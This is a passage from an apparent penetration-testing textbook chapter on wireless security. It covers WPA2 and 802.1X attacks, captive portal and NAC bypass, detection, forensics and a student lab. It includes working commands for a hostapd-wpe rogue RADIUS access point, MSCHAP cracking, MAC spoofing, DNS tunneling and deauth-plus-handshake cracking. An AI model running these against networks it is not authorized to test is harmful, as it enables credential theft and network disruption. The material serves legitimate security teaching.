SSL/TLS Stripping: After establishing a MitM position, tools like sslstrip can downgrade HTTPS connections to HTTP, enabling cleartext credential capture. While HSTS (HTTP Strict Transport Security) mitigates this for sites that implement it, many sites still do not use HSTS for all their subdomains.

WPAD (Web Proxy Auto-Discovery) Abuse: Many networks use WPAD to automatically configure proxy settings. An attacker on the wireless network can respond to WPAD queries and direct clients to use a malicious proxy, enabling transparent traffic interception without ARP spoofing.

25.8.5 IoT Wireless Protocol Attacks

Beyond Wi-Fi and Bluetooth, modern environments include numerous IoT wireless protocols, each with its own security considerations:

Zigbee (IEEE 802.15.4): Used in smart home devices, building automation, and industrial sensors. Zigbee has a well-known vulnerability: the network key is transmitted in cleartext during the device joining process. Tools like KillerBee (using the ApiMote or RZUSBstick hardware) can sniff and inject Zigbee packets.

Z-Wave: Another smart home protocol. Z-Wave's S0 security was broken, and while S2 security is more robust, many devices still use S0 or no encryption. The Z-Wave Alliance has made encryption mandatory for certified devices since 2017.

LoRaWAN: Used for long-range, low-power IoT communication. While LoRaWAN uses AES-128 encryption, implementation weaknesses (such as key reuse, weak session key derivation, and lack of downlink authentication) have been documented.

Thread/Matter: Newer protocols designed with security as a priority. Thread uses DTLS for transport security and commissioning security. Matter (formerly Project CHIP) builds on Thread for device-to-device communication with robust security.

Testing these protocols requires specialized hardware and tools, but they represent an increasingly important part of the wireless attack surface.

25.9 Wireless Penetration Testing Methodology

A structured methodology ensures comprehensive wireless security assessment. This section outlines a professional approach to wireless penetration testing.

25.9.1 Pre-Engagement

Before beginning wireless testing, establish:

• Scope definition: Which wireless networks, frequencies, and locations are in scope? Are guest networks, IoT networks, and Bluetooth included?
• Authorization: Written authorization specifying wireless testing activities, including active testing (deauthentication, injection) and passive monitoring
• Legal considerations: Wireless interception laws vary by jurisdiction. In the U.S., the Computer Fraud and Abuse Act, the Wiretap Act, and state laws may apply. In the EU, national implementations of the ePrivacy Directive govern wireless interception.
• Hardware requirements: Ensure all necessary wireless adapters, antennas, and specialized hardware (Proxmark3, Ubertooth, etc.) are available and functional
• Coordination: Notify the client's security operations center (SOC) about testing windows to prevent unnecessary incident response

25.9.2 Discovery Phase

The discovery phase maps the wireless environment:

1. Passive scanning: Use monitor mode to capture beacons and identify all wireless networks within range. Document SSID, BSSID, channel, encryption, signal strength, and vendor.
2. Client enumeration: Identify all connected clients and their probe requests. Probe requests reveal networks the client has previously connected to, which can inform evil twin attack planning.
3. Hidden network discovery: Monitor for probe requests and association frames that reveal hidden SSIDs.
4. Physical survey: Walk the facility perimeter to map signal coverage and identify areas of leakage beyond the intended boundary.
5. Rogue AP detection: Compare discovered access points against the client's authorized AP inventory to identify unauthorized devices.

25.9.3 Attack Phase

Based on discovery findings, execute appropriate attacks:

1. Encryption attacks: Attempt WPA/WPA2 handshake capture and cracking for PSK networks. Test PMKID capture. Document passphrase strength findings.
2. Infrastructure attacks: Test for WPS vulnerabilities. Attempt evil twin attacks if authorized. Test client certificate validation for Enterprise networks.
3. Client attacks: Test client devices for susceptibility to deauthentication, evil twin, and KARMA attacks.
4. Post-connection attacks: If network access is obtained, test network segmentation, access controls, and whether wireless access provides unintended access to sensitive resources.

25.9.4 Reporting Phase

Wireless testing reports should include:

• Inventory of all discovered wireless networks with security assessments
• Signal coverage maps identifying areas of concern
• Discovered vulnerabilities with severity ratings and remediation recommendations
• Evidence of successful attacks (screenshots, captured handshakes, cracked passphrases)
• Rogue AP findings
• Recommendations for wireless security improvements, prioritized by risk

25.9.5 Common Wireless Assessment Findings

Professional wireless assessments commonly reveal:

1. Legacy encryption: WEP or WPA-TKIP networks still in operation, particularly for legacy devices
2. Weak PSK passphrases: Passphrases based on company names, addresses, or common patterns
3. Inadequate segmentation: Guest and corporate wireless on the same VLAN or with insufficient firewall rules
4. Missing 802.11w (PMF): Networks vulnerable to deauthentication attacks
5. WPS enabled: Often enabled by default on consumer and small business equipment
6. Signal leakage: Corporate wireless accessible from parking lots, sidewalks, or neighboring buildings
7. Missing WIDS/WIPS: No monitoring for rogue APs or wireless attacks
8. Client misconfiguration: Devices connecting to any network with a recognized SSID without certificate validation
9. IoT devices on production networks: Unmanaged IoT devices sharing network segments with sensitive systems
10. Outdated firmware: Access points running firmware with known vulnerabilities (KRACK, FragAttacks)

25.10 Wireless Intrusion Detection and Defense

Comprehensive wireless security requires both preventive controls (strong encryption, authentication) and detective controls (monitoring, alerting, response).

25.10.1 Wireless Intrusion Detection Systems (WIDS)

A WIDS monitors the wireless spectrum for:

• Rogue access points: Unauthorized APs connected to the corporate network
• Evil twin attacks: APs impersonating legitimate corporate networks
• Deauthentication floods: Indicators of active attacks against clients
• Ad-hoc networks: Peer-to-peer wireless networks that bypass security controls
• Client misassociation: Corporate devices connecting to external networks
• Unusual traffic patterns: High volumes of management frames, probe requests from unknown devices, or encrypted traffic anomalies

Enterprise WIDS solutions include Cisco's aWIPS (Adaptive Wireless Intrusion Prevention System), Aruba's RFProtect, and open-source solutions like Kismet.

25.10.2 Rogue AP Detection

Rogue access point detection combines multiple methods:

# Manual rogue AP detection with Kismet
kismet -c wlan0mon

# Compare discovered APs against known inventory
# Flag any APs using corporate SSIDs with unexpected BSSIDs
# Identify APs connected to the wired network using wired-side scanning

# Automated detection with custom scripts
# Cross-reference wireless scan results with switch port MAC address tables
# to identify unauthorized devices connected to the network

25.10.3 Wireless Security Best Practices

A comprehensive wireless security program includes:

1. Encryption: WPA3 where possible, WPA2-Enterprise as minimum. Never use WEP or WPA-TKIP.
2. Authentication: 802.1X/EAP-TLS for enterprise networks. Strong, unique passphrases for PSK networks.
3. Segmentation: Place wireless networks on separate VLANs with firewall rules controlling access to internal resources.
4. Guest networks: Provide isolated guest networks with no access to internal resources.
5. WIDS/WIPS: Deploy and monitor wireless intrusion detection.
6. Physical security: Reduce signal leakage through AP placement, power adjustment, and directional antennas.
7. Client configuration: Use MDM/Group Policy to configure wireless profiles with certificate validation and prevent connection to unauthorized networks.
8. Regular assessment: Conduct periodic wireless security assessments, including war-walking/war-driving exercises.
9. MAC address randomization: Understand that modern clients randomize MAC addresses, affecting NAC and monitoring solutions.
10. IoT isolation: Place IoT devices on dedicated, segmented wireless networks with strict access controls.

25.11 Wireless Forensics and Incident Response

When a wireless security incident is detected, forensic analysis of wireless traffic and device logs is essential for understanding the scope and method of the attack.

25.11.1 Wireless Traffic Analysis

Captured wireless traffic (in pcap/pcapng format) can be analyzed with Wireshark to reconstruct attack sequences:

# Wireshark display filters for wireless forensics

# Show all deauthentication frames (potential attack indicator)
wlan.fc.type_subtype == 0x000c

# Show all authentication frames
wlan.fc.type_subtype == 0x000b

# Show EAPOL frames (four-way handshake)
eapol

# Show probe requests from a specific client
wlan.fc.type_subtype == 0x0004 && wlan.sa == CLIENT_MAC

# Show all traffic from a specific BSSID
wlan.bssid == AP_MAC

# Show beacon frames with a specific SSID
wlan.fc.type_subtype == 0x0008 && wlan.ssid == "NetworkName"

Key forensic indicators in wireless captures include:

• Deauthentication floods: Large volumes of deauthentication frames from a single source indicate active attacks against clients or the access point. The source MAC address in forged deauthentication frames is typically the AP's BSSID, but the actual transmitter is the attacker's adapter.
• Evil twin indicators: Two access points with the same SSID but different BSSIDs operating simultaneously, especially on different channels. Legitimate AP configurations do not typically exhibit this pattern unless the network uses load-balancing or band steering.
• Repeated handshakes: Multiple four-way handshakes between the same client and AP in rapid succession suggest forced disconnection and reconnection, which is the hallmark of handshake capture attacks.
• Unusual probe requests: Clients probing for networks that should not exist in the physical environment may indicate compromised devices or devices that have previously connected to rogue networks.
• Management frame anomalies: Inconsistent capabilities, supported rates, or security parameters in management frames may indicate frame injection or spoofing.
• High probe request volume: A sudden increase in probe requests from an unknown MAC address may indicate wireless reconnaissance by an attacker.

25.11.2 Access Point and Controller Log Analysis

Enterprise wireless infrastructure generates logs that are invaluable for forensic analysis:

• Client events: Association, disassociation, authentication success and failure, roaming events, and session termination reasons
• Security events: WIDS/WIPS alerts, rogue AP detections, and containment actions
• RF events: Channel changes, power adjustments, interference detection, and radar events (DFS channels)
• Configuration changes: AP configuration modifications, SSID changes, and security policy updates

Correlating wireless controller logs with RADIUS logs, DHCP logs, and network flow data provides a complete picture of a wireless security incident.

25.11.3 Wireless Incident Response Playbook

A wireless incident response playbook should define specific procedures for common wireless incidents:

Rogue Access Point Detected: 1. Confirm the rogue AP through wired-side MAC address table analysis 2. Physically locate the device using signal strength triangulation 3. Disconnect the device from the network 4. Analyze connected clients for potential compromise 5. Determine whether data exfiltration occurred through the rogue AP

Deauthentication Attack Detected: 1. Identify the target network and clients affected 2. Deploy additional wireless monitoring to capture the attacker's traffic 3. Check for concurrent evil twin activity 4. Implement 802.11w (PMF) if not already enabled 5. Assess whether handshakes were successfully captured by the attacker

Evil Twin Attack Detected: 1. Alert affected users through alternate channels (not the compromised wireless network) 2. Enable containment on the WIPS to suppress the rogue AP 3. Force reconnection of affected clients to the legitimate network 4. Assess credential exposure for clients that connected to the evil twin 5. Reset credentials for potentially compromised accounts

25.12 Enterprise Wireless Architecture Attacks

While much wireless security testing focuses on encryption and authentication, real-world wireless penetration tests in enterprise environments encounter sophisticated architectures that require equally sophisticated attack approaches.

25.12.1 802.1X/RADIUS Attacks

Enterprise wireless networks using WPA2-Enterprise or WPA3-Enterprise rely on 802.1X authentication through a RADIUS server. Attacking this architecture requires different techniques than PSK cracking:

EAP Downgrade Attacks: Some 802.1X implementations support multiple EAP methods, including less secure options. By deploying a rogue AP that only offers weaker EAP methods (such as EAP-MD5 or LEAP), an attacker may be able to capture credentials in a format that can be cracked offline. This works because many supplicants are configured to accept multiple EAP types rather than enforcing a specific method.

Certificate Impersonation: In EAP-PEAP and EAP-TTLS deployments, the authentication server presents a certificate to the client during the TLS tunnel establishment. If clients are not configured to validate the server certificate (a disturbingly common misconfiguration), an attacker can deploy a rogue RADIUS server with a self-signed certificate and capture authentication credentials.

# hostapd-wpe: Wireless Pwnage Edition for enterprise attacks
# Configure hostapd-wpe to capture 802.1X credentials
cat > hostapd-wpe.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=CorpWiFi
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
EOF

# Launch the rogue RADIUS AP
hostapd-wpe hostapd-wpe.conf

# Captured credentials appear in hostapd-wpe.log
# MSCHAP challenge/response can be cracked with asleap or hashcat
asleap -C CHALLENGE -R RESPONSE -W /usr/share/wordlists/rockyou.txt

RADIUS Server Vulnerabilities: RADIUS servers themselves may have vulnerabilities. The 2024 "Blast-RADIUS" vulnerability (CVE-2024-3596) demonstrated that the RADIUS protocol's use of MD5 for response authentication could be exploited through collision attacks, allowing an attacker with network access to forge authentication responses.

25.12.2 Captive Portal Attacks

Guest networks and public Wi-Fi typically use captive portals for authentication or terms-of-service acceptance. These portals are frequently vulnerable:

Captive portal bypass: Many captive portal implementations can be bypassed through DNS tunneling (the DNS resolution required for the portal redirect often works before authentication), MAC spoofing (cloning the MAC address of an already-authenticated client), or exploiting allowed domains (some portals whitelist specific domains for pre-authentication access).

Portal exploitation: Captive portal web applications may have standard web vulnerabilities including SQL injection, cross-site scripting, or authentication bypasses. Since these portals run on the local network, they are often developed with less security rigor than public-facing applications.

# DNS tunneling to bypass captive portal
# Client side (using iodine)
iodine -f -P password tunnel.yourdomain.com

# MAC spoofing to clone an authenticated client
# First, identify an authenticated client
airodump-ng wlan0mon  # Look for clients associated with the target AP
# Clone their MAC
ip link set wlan0 down
macchanger -m TARGET_CLIENT_MAC wlan0
ip link set wlan0 up

25.12.3 Wireless Network Access Control (NAC) Bypass

Organizations may deploy NAC solutions to restrict which devices can connect to wireless networks. Common bypass techniques include:

MAC address spoofing: If NAC relies solely on MAC address whitelisting, spoofing a known-good MAC address grants access. Observe the network for legitimate client MAC addresses and clone one when the original device disconnects.

VLAN hopping: Some wireless NAC implementations place unauthorized devices on a restricted VLAN. If the AP or switch is misconfigured, VLAN hopping techniques (802.1Q double-tagging, switch spoofing) may provide access to production VLANs.

Device profiling evasion: Advanced NAC solutions profile connecting devices based on DHCP fingerprints, HTTP user-agents, and other characteristics. Modifying these attributes to match an authorized device type (such as a corporate laptop or printer) may bypass device-type restrictions.

Blue Team Perspective: Enterprise wireless security is only as strong as its weakest configuration. Enforce server certificate validation on all 802.1X clients through MDM or Group Policy -- this single control prevents the most devastating enterprise wireless attacks. Implement certificate pinning where possible, require EAP-TLS (certificate-based) authentication for high-security networks, and regularly test your wireless NAC configuration to ensure it cannot be bypassed through MAC spoofing or device profiling evasion.

25.12.4 Wi-Fi Direct and Peer-to-Peer Attacks

Wi-Fi Direct allows devices to communicate directly without an access point, creating an often-overlooked attack surface:

• Printers and displays: Many enterprise printers and wireless display adapters expose Wi-Fi Direct interfaces that accept connections without authentication
• Mobile device exposure: Smartphones and tablets with Wi-Fi Direct enabled may accept incoming connections, particularly during file transfer operations
• Persistent groups: Wi-Fi Direct persistent groups maintain connections across sessions, allowing a compromised device to automatically reconnect to an attacker

Testing for Wi-Fi Direct vulnerabilities involves scanning for Wi-Fi Direct group owners using tools like wpa_cli and attempting to join their groups:

# Scan for Wi-Fi Direct devices
wpa_cli p2p_find

# List discovered peers
wpa_cli p2p_peers

# Attempt connection to a discovered peer
wpa_cli p2p_connect PEER_MAC pbc

25.12.5 Wireless Coexistence and Interference Attacks

In dense wireless environments, RF interference can be used as an attack vector:

Channel jamming: Targeted RF interference on specific channels can force clients to roam to attacker-controlled access points operating on unjammed channels. While broadband jamming is easily detected, narrowband jamming targeting specific channels can be more subtle.

Beacon flooding: Generating thousands of fake beacon frames creates confusion for both clients and wireless management tools. This can disrupt automatic channel selection algorithms and mask rogue AP deployments in the noise.

Deauthentication as a service denial tool: Beyond its use in handshake capture, sustained deauthentication attacks can render a wireless network unusable. Protected Management Frames (802.11w / PMF) is the primary defense against deauthentication attacks, but many legacy devices do not support it.

25.13 Wireless Testing in the MedSecure, ShopStack, and Student Lab Environments

MedSecure Healthcare

MedSecure's wireless assessment reveals several concerns: medical IoT devices (patient monitors, infusion pumps) connected to the same wireless network as staff workstations, a legacy WPA2-PSK network used by older medical equipment that cannot support Enterprise authentication, and guest Wi-Fi without adequate isolation from the clinical network. The tester demonstrates that compromising the guest network's captive portal allows access to medical device traffic, a critical finding for a healthcare environment subject to HIPAA requirements.

ShopStack E-Commerce

ShopStack's retail locations use wireless for point-of-sale terminals, inventory scanners, and customer Wi-Fi. The assessment focuses on PCI DSS wireless requirements: verifying that cardholder data environment (CDE) wireless networks use WPA2-Enterprise with strong authentication, testing segmentation between customer and POS networks, and performing quarterly rogue AP detection scans as required by PCI DSS Requirement 11.1.

Student Home Lab

Students can practice wireless attacks using inexpensive equipment:

1. Hardware: A compatible USB wireless adapter (such as the Alfa AWUS036ACH) and a second adapter or an old router configured as a target AP
2. Software: Kali Linux with the aircrack-ng suite, Bettercap, and Kismet
3. Lab setup: Configure a dedicated AP with WPA2-PSK using weak passwords for cracking practice. Never test against networks you do not own.
4. Practice exercises: - Set up monitor mode and capture beacons - Perform WPA2 handshake capture and cracking with a known weak password - Create an evil twin of your own test network - Scan for BLE devices and enumerate services

# Student lab: Create a practice WPA2 network and crack it
# 1. Configure your router with SSID "TestNetwork" and password "password123"
# 2. Connect a test device to the network
# 3. Capture the handshake:
sudo airodump-ng --channel 6 --bssid [ROUTER_MAC] -w test wlan0mon
# 4. Deauthenticate the test device:
sudo aireplay-ng --deauth 3 -a [ROUTER_MAC] -c [CLIENT_MAC] wlan0mon
# 5. Crack the handshake:
aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap

25.14 Summary

Wireless networks represent one of the most significant and frequently overlooked attack surfaces in modern organizations. The broadcast nature of radio communications, combined with the complex history of wireless security protocols, creates opportunities for attackers that do not exist in wired networking.

This chapter traced the evolution of wireless security from the broken WEP protocol through WPA and WPA2 to the current WPA3 standard, examining the vulnerabilities discovered at each stage. We explored practical attack techniques including handshake capture and cracking, PMKID attacks, evil twin deployments, and the groundbreaking KRACK and Dragonblood research. We also examined the growing importance of Bluetooth and BLE security as these technologies proliferate in consumer and enterprise environments.

The key takeaway for ethical hackers is that wireless security assessment requires specialized hardware, dedicated software tools, and a thorough understanding of radio frequency behavior and wireless protocols. A penetration test that ignores the wireless attack surface provides an incomplete picture of the organization's security posture.

For defenders, the lessons are equally clear: deploy the strongest available encryption (WPA3 where possible), implement Enterprise authentication for corporate networks, segment wireless traffic, deploy wireless intrusion detection, and regularly assess wireless security through both automated scanning and manual testing.

As wireless technologies continue to evolve -- with Wi-Fi 7, Bluetooth 5.4, and emerging IoT protocols -- the wireless attack surface will only expand. Staying current with both offensive and defensive wireless techniques is essential for security professionals in any role.

Review Questions

1. Explain why WEP encryption is fundamentally broken. What specific cryptographic weaknesses make it vulnerable?

2. Describe the WPA2 four-way handshake and explain why capturing it enables offline password cracking.

3. How does the PMKID attack differ from traditional handshake capture? What makes it particularly effective?

4. Explain the KRACK attack. Why did it affect virtually every Wi-Fi device in the world?

5. What improvements does WPA3's SAE handshake provide over WPA2-PSK? How did the Dragonblood attacks undermine these improvements?

6. Compare WPA2-Personal (PSK) and WPA2-Enterprise (802.1X) in terms of security. Why is Enterprise mode recommended for organizations?

7. Describe an evil twin attack. How can organizations detect and prevent this type of attack?

8. What Bluetooth vulnerabilities were revealed by the BlueBorne, KNOB, and BIAS research? What common theme connects these attacks?

9. Design a comprehensive wireless security program for a mid-size organization. What technical controls, policies, and monitoring capabilities would you include?

10. In the TJX breach scenario, what specific failures enabled the attack? What wireless security controls would have prevented or detected the breach?